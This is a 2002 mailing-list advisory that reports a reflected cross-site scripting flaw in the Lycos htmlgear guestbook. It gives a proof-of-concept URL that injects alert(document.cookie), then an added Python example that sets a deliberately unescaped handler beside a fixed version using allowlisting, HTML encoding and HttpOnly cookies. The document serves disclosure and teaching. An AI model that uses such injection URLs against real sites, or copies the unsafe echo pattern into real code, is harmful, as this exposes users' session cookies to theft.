XSS in lycos htmlgear guestbook

From: Pistone (jorgepat_private)
Date: Mon Jul 15 2002 - 10:32:24 PDT


    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1
    
    
     URL:  Htmlgear.lycos.com
     
     If a malicious user can get the guestbook user to follow
     a simple link, then they can grab that user's htmlgear
     cookies and possibly use them to authenticate as that
     user.
     
     
     WORKING EXAMPLE
    
    http://htmlgear.lycos.com/guest/control.guest?u=usuario3&i=1&a=view
    lert(document.cookie)</script
    
     the support of lycos receives a copy of the problem
     
     
     Regards,
     
     Pistone
     - -----------------
     www.gauchohack.com.ar
     
    -----BEGIN PGP SIGNATURE-----
    Version: GnuPG v1.0.6 (GNU/Linux)
    Comment: For info see http://www.gnupg.org
    
    iD8DBQE9MwcyY47Vx76lNPkRApjSAJ9DlpPy4yanxPXKPdy4AGpujFqjeACgoIA2
    rixgTR3+M3K29PtPNmGHNEg=
    =2z2c
    -----END PGP SIGNATURE-----
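
The fix for the reflected-parameter issue reported above, as an added example that is not part of the original post and is not Lycos code: a handler that echoes a query parameter into HTML unescaped, next to a version that validates and HTML-encodes it and marks the session cookie `HttpOnly`. That `a` is the reflected parameter is an assumption, as are the host `guestbook.example`, the action names, the page markup and the cookie name.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Assumed action names; only "view" appears in the advisory.
ALLOWED_ACTIONS = {"view", "sign"}

# Constructed test URL (hypothetical host) with a harmless marker script
# percent-encoded into the a= parameter.
SAMPLE_URL = ("http://guestbook.example/guest/control.guest"
              "?u=usuario3&i=1&a=view%3Cscript%3Ealert(1)%3C/script%3E")


def _action(url):
    """Return the decoded a= parameter, or an empty string if absent."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return query.get("a", [""])[0]


def render_unsafe(url):
    """'Before' form: the parameter reaches the page as live markup."""
    return 200, "<p>Guestbook action: " + _action(url) + "</p>"


def render_safe(url):
    """Allowlist the action, and HTML-encode anything echoed back."""
    action = _action(url)
    encoded = html.escape(action, quote=True)
    if action not in ALLOWED_ACTIONS:
        return 400, "<p>Unknown action: " + encoded + "</p>"
    return 200, "<p>Guestbook action: " + encoded + "</p>"


def session_cookie_header(token):
    """HttpOnly keeps the cookie out of reach of document.cookie."""
    return ("Set-Cookie: session=" + token +
            "; HttpOnly; Secure; SameSite=Lax; Path=/")


if __name__ == "__main__":
    print(render_unsafe(SAMPLE_URL))
    print(render_safe(SAMPLE_URL))
    print(session_cookie_header("constructed-token"))
```

Output encoding closes the injection itself; the `HttpOnly` attribute only limits what a script can read if another injection point is missed.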
    


